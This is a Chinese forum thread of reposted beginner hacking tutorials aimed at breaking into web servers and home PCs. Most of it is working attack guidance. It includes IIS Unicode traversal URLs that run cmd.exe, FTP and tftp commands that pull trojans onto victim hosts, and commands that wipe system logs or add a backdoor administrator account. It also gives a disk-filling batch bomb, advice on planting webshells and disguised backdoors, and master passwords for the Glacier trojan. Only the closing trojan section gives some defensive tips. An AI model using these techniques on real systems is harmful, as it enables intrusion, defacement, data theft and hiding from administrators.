ping www.flyingfish.com,看看窗口里有了什么?是不是有三行回应,其中的111.111.222.222就是ip了(还是胡说的,一个例子)。有人是不是要问,我这里怎么没有。那可能是两个原因,第一,你打错命令了;第二,该主机装了防火墙,禁止ping,不过这种可能很小。

知道了ip,下一步应该确定端口了。下面是一些常用的端口的默认值

21--ftp 重要哦

23--telnet 欢呼吧

25-smtp 尽管重要,但似乎没什么可利用的

53--domain 同上

79--finger 可知道用户信息了

80--http 要看网页,没它不行吧

110--pop 收信的

139--netbios 共享用的,很有利用价值哦

3389--win2000超级终端 呵呵,这个好!

其实端口有上千种,这些最最常用

我们怎么知道服务器有什么端口打开呢??去找个扫描器吧,x-scan ,super scan,flux等等很多哦。这里我推荐super scan ,速度很快,本站也有其教程哦!用法还是比较傻瓜的,估计大家不会有问题,轻轻几点,打开的端口就出现了。不错不错,上面说到的都有(太理想化了吧!)

那么我们该如何应对呢?

ps:忘了说一声,顺便扫一下7626,冰河有也说不准哦:)

若有ftp,那就用用匿名登陆。自己动手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望

telnet在!好!telnet 111.111.222.222,出现窗口了吧!嗯?要密码?看来网管还不是超级注意文明用语:)随便猜个,错了,闪人!

smtp,看着它,无奈

domain,一般它带了局域网了

finger 可以知道用户列表了,不好,忘了用法了,幸好finger很少出现

80肯定在,我们等会来对付它

110 有smtp,pop在也不奇怪了

139 找个扫描器来找找有没有露在外面的共享吧,日后也用得着

3389 太太太好了!!打开客户端吧,用输入法漏洞试试,成了就干了它!不成也没事,我们以后完全控制它3389会很方便的。

端口扫完了!我们在多了解它一点吧!追捕大家都知道吧,其实用它获取主机信息也不赖哦。打开追捕,输入ip,选择智能追捕,是不是有很多信息出来了?虽然不能直接利用,但毕竟我们有对它有了进一步的了解。

掌握了那么多信息,我们该做点什么了,一般黑客入侵都是靠着系统漏洞,不会都傻傻地去暴力破解的。我们现在就要看看它有什么漏洞。

对漏洞大家可能不太了解,我这里也不能一一说明了,太多了,感兴趣的话去论坛找freedom吧!

目前广泛利用和存在的漏洞有:unicode,unicode后续,iis溢出,.idq,.frontpage extend,输入法漏洞等等大漏洞。 至于如何确定,呵呵,绝对不会是一行一行地在ie中试吧,拿出x-scan吧,很好的扫描器哦!

稍微设置一下就上路吧!过了一会,呵呵,报告出来了,快看,哇!漏洞一大堆!这下赚了!各条漏洞都有详细的信息,大家看吧,总比我说的准了。

现在这台主机已经和我们成为亲戚了,要让这位亲爱的亲戚做点事,就要开始各种攻击了,下回我们就探讨一下最最可爱的unicode漏洞,各位可能就会在unicode中完成第一次黑客体验


B4层 发表时间: 10-07-16 18:16

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
基础知识(中)


上传,这个我们后面介绍。

几点忠告:

1,对于没有主页的机器(就是正在建立的主页),不要改它,这很没水准,也很没道德

2,echo前记得帮他们做好备份

3,不准在主页里加入恶性语句

2,下载文件

要是有什么有用的文件被你发现,那我们如何下载呢?

最简单的方法:把文件copy至网页目录下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后,下载11.11.22.22/baby.zip就行了,注意!实际应用中要记得对文件名进行修改,总之不能暴露。

别的方法:对不起,没想好:)

3,最重要的上传

一般方法:ftp法

首先建一个ftp脚本文件:c:\hehe.haha(名字乱取把),申请一个ftp账号,然后用echo吧

echo+open ftp.cshu.com(ftp主机) > c:\hehe.haha

echo+user yourname >> cc:\hehe.haha (yourname是用户名)

echo+yourpasswd >> c:\hehe.haha (yourpasswd是密码)

echo+get setup.exe >> c:\hehe.haha 要下载的文件

echo+quit >> c:\hehe.haha

完了以后:ftp+/s:c:\hehe.haha,由于是ftp主机,那么速度一定很快,过一会setup.exe就会出现在当前目录了(也就是cmd所在目录)

别忘了先上传到ftp主机,不要做马大哈哦!

最简单的方法:tftp法。

这种方法不用中转服务器,首先准备一个tftp服务端,它的作用就是把你的机器做成一个tftp服务器,利用漏洞机器来下载(注意,运行tftp时不要运行其他的ftp软件)

在这里我推荐cisco tftp server,自己去找找把,实在没有来找我:)

安装好后运行,别忘了设置好默认目录,否则会找不到文件

tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe(ihateu.exe在默认目录里)

1.2.3.4为你的ip,用unicode运行一下,会看到tftp server里有反应了,这就好了,不一会,文件就传上去了,方便把!

学会了上传,我们就可以好好改主页,还可以上传木马,还可以把程序放上去运行…………(运行程序和在dos里一样)

4,如何清除痕迹

虽然国内主机纪录ip的不是很多,但万事小心为妙,unicode权限达不到admin。用cleaniislog行不通,就…………直接删吧!

C:\winnt\system32\logfiles\*.*

C:\winnt\ssytem32\config\*.evt

C:\winnt\system32\dtclog\*.*

C:\winnt\system32\*.log

C:\winnt\system32\*.txt

C:\winnt\*.txt

C:\winnt\*.log

全……擦掉!

四,细节问题。

1,遇到长文件名怎么办?

c:\program files\

就用c:\"program20%files"\

2,遇到空格怎么办?
%代替喽,或者xx yy=xxyy~1
基础知识(5)


%代替喽,或者xx yy=xxyy~1

3,如何做个很大的文件?

目的就是破坏啦!我不喜欢不过教教你们啦

@echo off

echo big > c:\a.a

:h

copy c:\a.a+c:\a.a c:\a.a

goto h

注意不要乱来啊!

4,输入命令,没反应或反应不对。

:)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!看在你看到这里那么给我面子的份上,在给你几个吧!
http://www.exsample.com/scripts/ ... macr;..&Agrave;
&macr;../winnt/system32/cmd.exe?/c+dir+c :\ 或 http://www.exsample.com/msadc/.. ... 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_vti_bin ... 2/cmd.exe?/c+dir+c:\ 或 http://www.exsample.com/_mem_bin ... 2/cmd.exe?/c+dir+c:\

不一定有用哦!

5,如何找到unicode漏洞的主机

呵呵:)最好的方法自然是………………一个一个ping,一个一个试喽:)

不要打我呀!我说我说。最好找一个cgi扫描器,unicode查找器多如牛毛,随便找个吧!

6,我copy,del文件,怎么显示aceess denined?

这个不好办了,由于unicode所拥有的权限有限,出现上述情况很正常,我们要做的便是提高自己的权限!

这个我会在今后介绍,现在你可以试试attrib

attrib -r -h -s c:\autoexec.bat

再对autoexec.bat进行操作,看看有没有效果,成功率不高,不好意思!

7,我黑了主页,天下无敌?

我本来想对你说:“见你的鬼去吧!”不过想想不大礼貌,有失我绅士风度,所以改个口

echo主页或改主页在不懂黑客的人看起来很了不起,不过,它最多算是一个基础,拿到admin才是我们的终极目标!

对cshu全体成员来说,不准去改正在建立的网页!这是我们的原则!

要是你想耍耍威风,那也可以理解,那就去黑外国的,或者url欺骗也是个好选择

8,我如何做更多的事?

第一,努力提高权限

第二,由于cmd的限制,我们可以做的不多,那就要程序帮忙,上传吧!切记,要隐秘!


一,frontpage扩展攻击。

为什么把它放第一位呢?原因很简单,它最最方便,frontpage服务器扩展是一种方便的远程站点管理功能,可是由于某些网管注意文明用语的疏忽(为什么注意文明用语满街飞?)不设置访问密码,如果那样的话,我们只要用一个frontpage就可以黑它了!!这完全不是黑客工具,但它确实办到了,还要感谢注意文明用语网管和微软啊!

具体做法:

1,准备frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,只是不要是老掉牙的版本就行了。

2,找一台有frontpage扩展的主机,可以用流光,也可以用搜索引擎查找/_vti_pvt/,这是frontpage扩展的标志。

3,接下来打开frontpage,(妈妈:你在干什么?回答:做网页!妈妈:好孩子!)文件菜单下选择“打开站点”,然后在文件夹框里写入 http://11.11.22.22(我习惯用这个做例子


B5层 发表时间: 10-07-16 18:16

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
基础知识(下)


net user iusr_machinename cshu (把它的密码设为cshu)

net localgroup administrators iusr_machinename /add(加入administrators组)

这样我们就拥有了iusr_machinename这一账号,admin权限,简单吧!

熟悉一下net use 命令:

net use \\11.11.22.22\ipc$ "cshu" /user:iusr_machinename 建立连接

copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 复制到机器c:\winnt\system32上,若是c$.d$,就表示c,d盘

net time \\11.11.22.22 看到了时间了,比如是8点

at \\11.11.22.22 8:03 haha.exe 就会在8点3分执行。

net use \\11.11.22.22 /delete 断开连接

应该是很简单的。这样我们就可以随心所欲地操作11.11.22.22了,admin是最高权限,所以没有限制的:)

是不是很简单?所以我是溢出是很厉害的攻击方法。

3389知道吧!如果能进入,那么用上面的命令也可以轻易拿到admin的,不过呢,有3389漏洞的机器已经不多了。看你运气了!(本站有几篇关于3389的好文章)

总的来说,还是unicode的机器最多,为什么注意文明用语网管不会灭绝呢:)虽然unicode拿admin有一定难度,但还是要试试的。

首先,我们检查一下unicode在这台机器上的权限,一般看读写权限和运行权限。用copy 或del命令便可确定读写权限,然后上传文件运行一下便可知道运行权限。

1,如果我们可以对winnt\repair和winnt\config进行访问,sam文件就在里面(win2k里是sam,nt4里是sam._)那么用tftp 把get改成put下载下来,或者把它复制到inetpub\wwwroot下,改成zip下载。

拿到sam后,用lc3破解版暴力破解吧,这种方法比较费时。

2,要是有运行权限,拿就抛个木马上去吧!虽说木马可能也会没有权限,但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是,最好放最新的木马,因为木马很容易被杀毒软件查杀!

3,其实和2差不多,只不过变成了键盘记录器,选个国产的,一般杀毒软件不会杀出来,认真配置好后传上去,下线睡觉或是做家务去!等到网管用了机器,密码就会被纪录下来,我们在去取,admin就顺利到手了:)

4,getadmin和pipeupadmin,前者是nt4用的,后者是2000。看看帮助知道使用方法后(其实猜都猜得到)就可以提升一个用户的权限,有一步登天的感觉!

5,手工做个bat文件,里面是建立用户等命令,然后把它放到自启动下,有很多途径:documents and settings下的开始菜单下的启动,知道了吧,至于要顺利放进去的话,会遇到空格长名等等问题,就看你的基本功了。win.ini里有load,加进去。还有便是注册表,好好研究一下regedit.

6,本地溢出。这个比较高深,我能告诉大家的只是,去四处找找本地溢出程序。

总的来说,unicode改主页是非常简单的,但是若是要取得更高的权限,就要一番努力,上面的方法只是些思路,实际操作时需要具体处理,开动脑筋,把方法都结合起来。(是不是听起来有点玄?)

想想好像没有什么其他的途径要说了,什么?linux,呵呵,我还不大懂,就不在这里瞎说了。

那今天就说到这里了,6里面我会说说后门制作,小问题和我的一点经验。期待吧!



这是最后一节了,写的傻傻的,但我毕竟坚持下来了,值得鼓励!(偶尔阿q一下)在写菜鸟操的同时,我们的cshu(cshu.51.net)也在默默成长,但现在我要准备离开了,真是有点舍不得。在今后的日子里,还请大家多多支持cshu和christ,freedom他们。

今天说点什么呢?没有主题,乱谈一通吧!

首先我要吐一次血,当然是为了推荐一样东西,就是流光!(那么没创意,老土!)不管怎么说,小榕的流光应该是中国第一黑软,他综合了诸多的攻击手段,使攻击便捷化,当然可能让我们养成了懒惰的习惯。不会用流光的最好去学学。

我来说说我自己觉得最有用的几个项目:

1,探测----扫描pop3/ftp/nt/sql主机,要是无目的地黑,那么用这个再合适不过了。进去后填好ip范围(范围可以扫大一点,它很快的),至于类型嘛,要是你要一大堆unicode,那么选择iis/frontpage再合适不过了,要是要更高的权限,sql是不错的选择。完成后,表格里会多出一大堆东西。

remote execute-x 这是几种不同的unicode,用它比用ie来执行方便多了,但是echo有问题(是我自己不会,会的朋友快教我)

remote ftp pcaw file method-x 这是远程获取pc anywhere的密码文件,要使用的话,你首先要有一个ftp账号,去申请吧!顺利拿到cif文件后,用流光自带的工具就可以解开密码,很爽的!

remote ftp sam -x 拿sam的,还是用最好的lc3来解吧!

frontpage extended 这是frontpage扩展,不过不要高兴,是要密码的。但是若是后面跟了privilege hole的话,放声大笑吧!(小心不要让邻居拿着菜刀冲进来)打开frontpage,打开站点, http://ip就可以了!(http://不要忘)

此外还有一点变通,大家肯定读的懂的。

2,探测----高级扫描工具。这可是流光4中的重头戏,综合了很多漏洞,还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测,很快扫出漏洞后,流光会生成一个报告文件,其中包含漏洞的连接,要是你看不懂的话,建议你拿出x-scan,里面有漏洞描述的。

3,工具----nt管道远程命令,种植者,这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号,相信在此之前你应该有几个了吧,那就快点试试吧!

总的来说,流光的使用是非常简单的,其中也有不少工具值得我们一用,tools目录里有一些很好的工具,exploit里则有很多溢出攻击程序,前提是你应该会c,不会的话我也没办法,学会c起码要看10倍于菜鸟操的资料吧!另外给大家推荐一个站点:www.hack.co.za,有什么漏洞的话就去那里找找,你会有所收获的。


然后我想说说一些黑站的经验。

☆当我们用unicode控制一台机器时,我向大家推荐用asp木马,阿新的改良版,本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息,最好也放一个cmd.asp上去,运气好的话,可以运行命令的。

上传好后,ie里输入其中index.asp的地址,呵呵,我们就能方便地管理其中的文件了,可以改网页,改代码,上传脚本文件麻烦?那就用它来生成吧!

推荐他的最大原因便是----便于隐藏!一般网站总有一个庞大的目录,选择一个深的,放进去,网管很难发现的:)

最后对大家说一句,要是有备份目录(很多网站都有的),最好也放一份进去。有一次我用这个东西修改一家网站的首页,改了两三次网管也没删掉,可是突然一天不行了,原来他用了备份的网页(还算机灵吧)

☆我想对大家说,对于国内网站,最好不要恶意去攻击,因为我们是中国人嘛!在5/1期间,我发现有一些国内站点被黑,留下的页面上不是poison box,而是中国人的话,这真是无耻到了极点!!!!大家千万不要学哦。还有,现在网上有很多还没有网页的主机,往往有很多漏洞,对于这种机器,竟有一些小人也会去改收页(比如上海那个姓杨的小子)这算什么?显示实力,炫耀技术?呵呵,见鬼去吧!

我的建议是,不要改它的首页,而是努力去拿admin,控制它,这样我们有很多选择:肉鸡,等它有正式主页后可以黑,或者把我们的主页放上去!比申请好多了,权限又足!当然很危险:)这样做是不是有品位多了?

☆要是我们拿到了admin,但有时却不能执行一些命令,那很可能是因为服务启动的问题。试着用以下命令:

net start termservice 启动win2k的终端控制

net start workstation 打开net use 功能

net start lanmanserver 打开ipc

net start eventlog 启动日志(你不会那么傻吧!stop)

net start schedule 打开计划(at)

net start server 共享

还有很多,net命令里去找吧!

☆打开telnet

1,远程去运行ntlm.exe,流光里有

2,net stop telnet

3, net start telnet

☆我推荐几种后门:winshell(默认端口5277)相对于srv,它好一些。remotenc这个是榕哥的作品,可以以指定用户执行,还可以自己起服务的名字,很棒的!

至于服务的名字,建议大家去看看win2k的进程名,学着起相类似的名字,要做到使网管看到了也不会引起警觉,或是有警觉也不敢去删,呵呵,这样就最好了!

☆代理问题。我推荐大家自己去做代理,控制了一台机器后,用snake前辈写的skserver去做个sock5。

具体做法就不详细说了,因为比较普通,只要熟悉一下用法就可以了。

做好了sock5,我们可以上oicq,下棋都用它,sock5代理可是很少见的哦!

要是实在拿不到sock5,用http也可以,这里推荐一个软件tcp2http,它具有很多功能。在给个站点:dzc.126.com国内最最好的的代理站点,怕死的朋友千万不要错过。

最后说说一些对于菜鸟同志的建议:

不要把黑当作一种显示自己的行为,要是你想耍威风,用url欺骗来骗mm最合适了,还可以弄个yahoo什么的……

不要在一项技术上停留过长时间,当你熟练掌握后,应该迅速学习下一个新技术。

不要和被你黑的网管过多接触,前车之鉴哦。

对于一台好机器要做好后门,不要轻易失去它。

想好好学黑客的话,就常去各大论坛转转,仔细读教程,忘记聊天室和网络游戏吧!

实践是最好的教程,再次重申!

应该多学计算机的其他方面的知识,任何知识在一定场合都是有用的。

编程技术……好像太难了,不过再难也要学。

想不出来了………………

好了,我们的菜鸟操终于结束了,我这个大菜鸟也可以退休了,拼搏一年后我会回来的。第一节里我曾许诺让大家学会黑站,不知道大家是否成功了,不管这么样,我们都该不断的努力学习,不是吗?



B6层 发表时间: 10-07-16 18:18

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
黑客常用兵器之木马篇(上)


“我知道远程控制是种武器,在十八般兵器中名列第七,木马呢?”
  “木马也是种武器,也是远程控制。”
  “既然是远程控制,为什么要叫做木马?”
  “因为这个远程控制,无论控制了什么都会造成离别。如果它钩住你的E-Mail,你的E-Mail就要和你离别;如果它钩住你的QQ,你的QQ就要和你离别。”
  “如果它钩住我的机器,我就和整个网络离别了?”
  “是的。”
  “你为什么要用如此残酷的武器?”
  “因为我不愿被人强迫与我所爱的人离别。”
  “我明白你的意思了。”
  “你真的明白?”
  “你用木马,只不过为了要相聚。”
  “是的。”

  一

  在众多的黑客武器中特洛伊木马(Trojan horse)这种攻击性武器无论是菜鸟级的黑客爱好,还时研究网络安全的高手,都视为最爱。虽然有的时候高手将木马视为卑鄙的手段。但是作为最为有效的攻击工具,木马的威力要比其他的黑客工具大得多。

  “木马既然如此有效,为何在Hacker兵器谱中排名靠后?”

  “因为使用木马往往不是很光明正大。”

  “哦?为何?”

  “在使用木马的人群中菜鸟黑客居多,他们往往接触网络不久,对黑客技术很感兴趣,很想向众人和朋友显示一番,但是去驾驭技术不高,不能采取别的方法攻击。于是木马这种半自动的傻瓜式且非常有效的攻击软件成为了他们的最爱。而且随着国产化的木马不断的出现,多数黑客的入门攻击几乎无一例外都是使用木马。当然对于那些黑客老手来说他们也并不是不使用木马了,他们通常会在得到一个服务器权限的时候植入自己编写的木马,以便将来随时方便进出这台服务器。”

  “但如此一来木马的名声不就随之降低了吗?”

  “是的,所以现在的黑客高手都耻于用木马,更耻于黑个人的计算机。”

  “不过木马在很多人的眼中仍然是一等一的绝好兵器。”
在众多的木马之中Cult of Dead Cow开发的Back Orific2000应该算是名气比较大的一个。这款软件是在Back Orific2.1的基础之上开发的,但是他最大的改动就是增加了对Windows NT服务器系列的支持。作为微软的高端产品,BO2000的这个功能无疑对Windows NT来说是致命的,就Windows NT本身而言,由于硬盘采取了NTSF的加密,普通的木马,包括冰河也无法控制,当然要想要让多数木马无法对Windows NT发挥作用最好将Windows NT转化为NTSF的格式下才会比较好用一些。

  而正因为如此BO2000才深得黑客高手的喜爱,因为他们感兴趣的也只有服务器,也只有Web Server才能够提起他们的胃口,那是一种来自深层感官的刺激。

  通常情况下木马大致可分为两个部分:服务器端程序和客户端程序。服务器端通常就是被控制端,也是我们传统概念上的木马了。

  二

  “你说BO2000好,但是绝大多数的杀毒招数都能够沟将其制服,而且我感觉他在使用上不如我手里的冰河锐利,况且我也不想黑什么服务器。我认为,个人电脑中隐藏有更大的宝藏,而且个人电脑脆弱的我能够利用任何一种方法摧毁它。

  “你说的很对,冰河确实锐利,而且称霸中华江湖一年之久,也可谓武林中少见的好兵刃,但是兵器虽然锋利,但兵器在打造的时候却留下来一个致命的缺点,这也是木马冰河为何在武林衰败的原因。”

  “这是一个什么样的弱点那?竟然如此致命?”

  “呵呵,说白了也很简单,冰河的作者在打造冰河2.X版本时就给它留下了一个后门,这个后门其实就是一个万能密码,只要拥有此密码,即便你中的冰河加了密码保护,到时候仍然行同虚设。”

  “什么!真有此事?想我许多朋友还因为冰河好用把它当作了一个免费的远程控制程序来用,如此这般,他们的机子岂不暴露无遗?”

  “呵呵,在黑客中瞒天过海、借花献佛这些阴险的招数都不算什么,多数木马软件的作者为了扩大自己的势力范围和争取主动权都会留一手,致命的一招。冰河的作者当然也不例外,而且由于作者钟爱许美静,所以每一个冰河中都包含许美静的歌词。当然作者为自己以后行事方便也留了几个万能密码。”

  “噢?万能密码?”

  “通常黑客在植入冰河这种木马的时候,为了维护自己的领地通常的要为自己的猎物加一个密码,只有输入正确的密码你才能够正常的控制对方的计算机,但是冰河的打造者为了方便自己的使用在冰河中加入了一个万能的密码,就像万能钥匙一样。冰河各版本的通用密码:

  2.2版:Can you speak Chinese?
  2.2版:05181977
  3.0版:yzkzero!
  4.0版:05181977
  3.0版:yzkzero.51.net
  3.0版:yzkzero!
  3.1-netbug版密码: 123456!@
  2.2杀手专版:05181977
  2.2杀手专版:dzq20000!

你可以试试看,是不是很轻松的就能够进入任何一台有冰河服务器端的电脑?”

  “真的进入了,果然有此事情,怪不得现在很多人都不再使用冰河。”

  “此外冰河还存在着两个严重的漏洞:

  漏洞一:不需要密码远程运行本地文件漏洞。

  具体的操作方法如下:我们选择使用相应的冰河客户端,2.2版以上服务端用2.2版客户端,1.2版服务端需要使用1.2版客户端控制。打开客户端程序G_Client,进入文件管理器,展开“我的电脑”选中任一个本地文件按右键弹出选择菜单,选择“远程打开”这时会报告口令错误,但是文件一样能上传并运行。

  任何人都可以利用这个漏洞上传一个冰河服务端就可以轻松获得机器的生死权限了,如果你高兴的话,还可以上传病毒和其它的木马。

  漏洞二:不需要密码就能用发送信息命令发送信息,不是用冰河信使,而是用控制类命令的发发送信息命令。”

  “当然这的确是一个原因,但更主要的是现在的多数杀毒软件都能克制冰河。”

  三

  木马通常会在三个地方做手脚:注册表、win.ini、system.ini。这三个文件都是电脑启动的时候需要加载到系统的重要文件,绝大部分木马使用这三种方式进行随机启动。当然也有利用捆绑软件方式启动的木马,木马phAse 1.0版本和NetBus 1.53版本就可以以捆绑方式装到目标电脑上,可以捆绑到启动程序上,也可以捆绑到一般程序的常用程序上。如果木马捆绑到一般的程序上,启动是不确定的,这要看目标电脑主人了,如果他不运行,木马就不会进入内存。捆绑方式是一种手动的安装方式,一般捆绑的是非自动方式启动的木马。非捆绑方式的木马因为会在注册表等位置留下痕迹,所以,很容易被发现,而捆绑木马可以由黑客自己确定捆绑方式、捆绑位置、捆绑程序等,位置的多变使木马有很强的隐蔽性。

  “在众多木马中,大多数都会将自己隐藏在Windows系统下面,通常为C:\Windows\目录或者C:\Windows\system\与C:\Windows\system32下隐藏。”

  “众多的目录中为何选择这两个目录?”

  “呵呵,当然是为了便于隐蔽。通常这几个目录为计算机的系统目录,其中的文件数量多而繁杂,很不容易辨别哪些是良性程序哪些是恶性程序,即便高手往往也会有失误删除的情况。而且,即便放置在系统目录下,就多数为重要的文件,这些文件的误删除往往会直接导致系统严重的瘫痪。”

  “原来如此。”

  “前辈,木马冰河是否也做了这些手脚?”

  “这是自然,木马一旦被植入目标计算机中要做的最重要的事就是如何在每次用户启动时自动装载服务端。冰河也是如此了。首先,冰河会在你的注册表中的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run和RUNSERVICE 键值中加上了\kernl32.exe(是系统目录),

  §c:\改动前的RUN下
  默认=""
  §c:\改动后的RUN下
  默认="C:\\WINDOWS\\SYSTEM\\Kernel32.exe"
  §c:\改动前RunServices下
  默认=""
  §c:\改动后RunServices下
  默认="C:\\WINDOWS\\SYSTEM\\Kernel32.exe"
  §c:\改动前[  HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command]的:
  默认="Notepad.exe %1"
  §c:\改动后[  HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command]的:
  默认="C:\\WINDOWS\\SYSTEM\\Sysexplr.exe %1"

可以看出之所以冰河可以自我恢复主要靠的是C:\\WINDOWS\\SYSTEM\\Sysexplr.exe,而且冰河服务器端的编制是加密的,没法简单的通过改注册表得到或换掉。另外值得一提的是,即便你删除了这个键值,也并非平安大吉,冰河还会随时出来给你捣乱,主要因为冰河的服务端也会在c:\windows目录下生成一个叫 sysexplr.exe文件,当然这个目录会随你windows的安装目录变化而变化。

B7层 发表时间: 10-07-16 18:19

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
黑客常用兵器之木马篇(下)


 五

  “哈哈,你可知道除了冰河这样的木马经常使用的隐身技术外,更新、更隐蔽的方法已经出现,这就是―驱动程序及动态链接库技术。驱动程序及动态链接库技术和一般的木马不同,它基本上摆脱了原有的木马模式―监听端口,而采用替代系统功能的方法改写驱动程序或动态链接库。这样做的结果是:系统中没有增加新的文件所以不能用扫描的方法查杀、不需要打开新的端口所以不能用端口监视的方法进行查杀、没有新的进程所以使用进程查看的方法发现不了它,也不能用kill进程的方法终止它的运行。在正常运行时木马几乎没有任何的症状,而一旦木马的控制端向被控端发出特定的信息后,隐藏的程序就立即开始运作。此类木马通过改写vxd文件建立隐藏共享的木马,甚是隐蔽,我们上面的那些方法根本不会对这类木马起作用。

  “可是前辈说的这种木马晚生并没有见到啊。”

笨蛋!你没有见过,你怎么知道我老人家也没有见过?告诉你我已经看到了一个更加巧妙的木马,它就是Share。运行Share木马之前,我先把注册表以及所有硬盘上的文件数量、结构用一个监控软件DiskState记录了起来,这个监控软件使用128bit MD5的技术来捕获所有文件的状态,系统中的任何文件的变动都逃不过他的监视,这个软件均会将它们一一指出。”

  “前辈我这里第一次运行Share后,系统好像没有动静,使用Dllshow(内存进程察看软件)观看内存进程,似乎也没有太大的变化。一般木马都会马上在内存驻留的,或许此木马修改了硬盘上的文件。”

  “好,那么你就接着用DiskState比较运行share.exe前后的记录。”

  “程序显示windows\applog里面的目录的一些文件和system.dat、user.dat文件起了变化,并没有其他文件的增加和修改。”

  “系统中的applog目录里面存放了所有应用程序函数和程序调用的情况,而system.dat和user.dat则是组册表的组成文件。你把applog目录里面的share.lgc打开来观看,它的调用过程是什么?”

  “调用过程如下:

  c15625a0 92110 "C:\WINDOWS\SYSTEM\OLEAUT32.DLL"
  c1561d40 c1000 "C:\WINDOWS\SYSTEM\OLE32.DLL"
  c1553520 6000 "C:\WINDOWS\SYSTEM\INDICDLL.DLL"
  c15d4fd0 2623 "C:\WINDOWS\WIN.INI"
  c15645b0 8000 "C:\WINDOWS\SYSTEM\SVRAPI.DLL"
  c1554190 f000 "C:\WINDOWS\SYSTEM\MPR.DLL"
  c154d180 a1207 "C:\WINDOWS\SYSTEM\USER.EXE"
  c1555ef0 13000 "C:\WINDOWS\SYSTEM\MSNET32.DLL"

  但是为什么前辈我们看不到MSWINSCK.OCX或WSOCK2.VXD的调用呢?如果木马想要进行网络通讯,是会使用一些socket调用的。”

  “那么接着你再观察注册表的变化。”
  “好像在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面,多了几个键值,分别是CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$,其内部键值如下:

  "Flags"=dword:00000302
  "Type"=dword:00000000
  "Path"="A:\\" 《-----路径是A到F
  "Parm2enc"=hex:
  "Parm1enc"=hex:
  "Remark"="黑客帝国"
  ”
  “这就对了,然后你在浏览器的地址栏输入\\111.111.111.1\CJT_C$。”

  “啊!居然把我的C盘目录文件显示出来了。”
  “现在你把CJT_C$改成matrix然后重启计算机,接着在浏览器的地址栏输入\\111.111.111.1\matrix。”

  “前辈也显示C盘目录文件了,很奇怪的是,在我的电脑里面硬盘看上去并没有共享啊?”
  “哈哈,那你再把"Flags"=dword:00000302的302改成402,reboot计算机。”

  “嘻嘻,硬盘共享已显示出来了。那么如何防止这种木马那?”
“哈哈哈哈,这种木马只不过用了一个巧妙的方法隐藏起来而已。你现在把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$全部删掉。如果你还放心不下,也可以把windows\system\下面的Vserver.vxd(Microsoft 网络上的文件与打印机共享,虚拟设备驱动程序)删掉,再把[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的VSERVER键值删掉。这样就可以了。另外,对于驱动程序/动态链接库木马,有一种方法可以试试,使用Windows的〖系统文件检查器〗,通过〖开始菜单〗-〖程序〗-〖附件〗-〖系统工具〗-〖系统信息〗-〖工具〗可以运行〖系统文件检查器〗,用〖系统文件检查器〗可检测操作系统文件的完整性,如果这些文件损坏,检查器可以将其还原,检查器还可以从安装盘中解压缩已压缩的文件。如果你的驱动程序或动态链接库在你没有升级它们的情况下被改动了,就有可能是木马,提取改动过的文件可以保证你的系统安全和稳定。”

  六

  “此外很多人中木马都会采用如下手段:

  1.先跟你套近乎,冒充成漂亮的美眉或者其他的能让你轻信的人,然后想方设法的骗你点他发给你的木马。

  2.把木马用工具和其它的软件捆绑在一起,然后在对文件名字进行修改,然后修改图标,利用这些虚假的伪装欺骗麻痹大意的人。

  3.另外一种方法就是把木马伪装好后,放在软件下载站中,着收渔翁之利。

  所以我这里提醒你一些常见的问题,首先是不要随便从小的个人网站上下载软件,要下也要到比较有名、比较有信誉的站点,通常这些网站的软件比较安全。其次不要过于相信别人,不能随便运行别人给的软件。而且要经常检查自己的系统文件、注册表、端口等,而且多注意些安全方面的信息。再者就是改掉windows关于隐藏文件后缀名的默认设置,这样可以让我们看清楚文件真正的后缀名字。最后要提醒你的是,如果有一天你突然发现自己的计算机硬盘莫名其妙的工作,或者在没有打开任何连接的情况下,猫还在眨眼睛,就立刻断线,进行木马的搜索。”

B8层 发表时间: 10-07-16 18:20

回复: xiaosi2007 [xiaosi2007]   论坛用户   登录
客常用兵器之扫面篇(上)

刀,兵器谱上排名第六。
  刀;
  一把好刀,光亮如雪;
  刃;
  一抹利刃,吹发即断;

  黑客手中的扫描器如同刺客手中之刀,杀人、保命;攻击、补漏。

  如果一个黑客手中没有一两个扫描器,那么他算不上是一个黑客,至少他是一个手里没有“刀”的黑客。没有“刀”的黑客是难以生存的……】

  “前辈,您为何如此看好扫描器?为什么黑客必须要有扫描器?”

  “后生,你上次木马害我不浅,你这次又像搞什么花样?”

  “上次小生只是跟前辈开了一个玩笑,还望前辈见谅。”

  “罢了,我老人家还不止于和你如此一般见识。此次你又有什么不清楚的?”

  “我不太清楚扫描器为何会像您所说的有如此大的威力,扫描器在黑客攻击中能起到什么作用?”

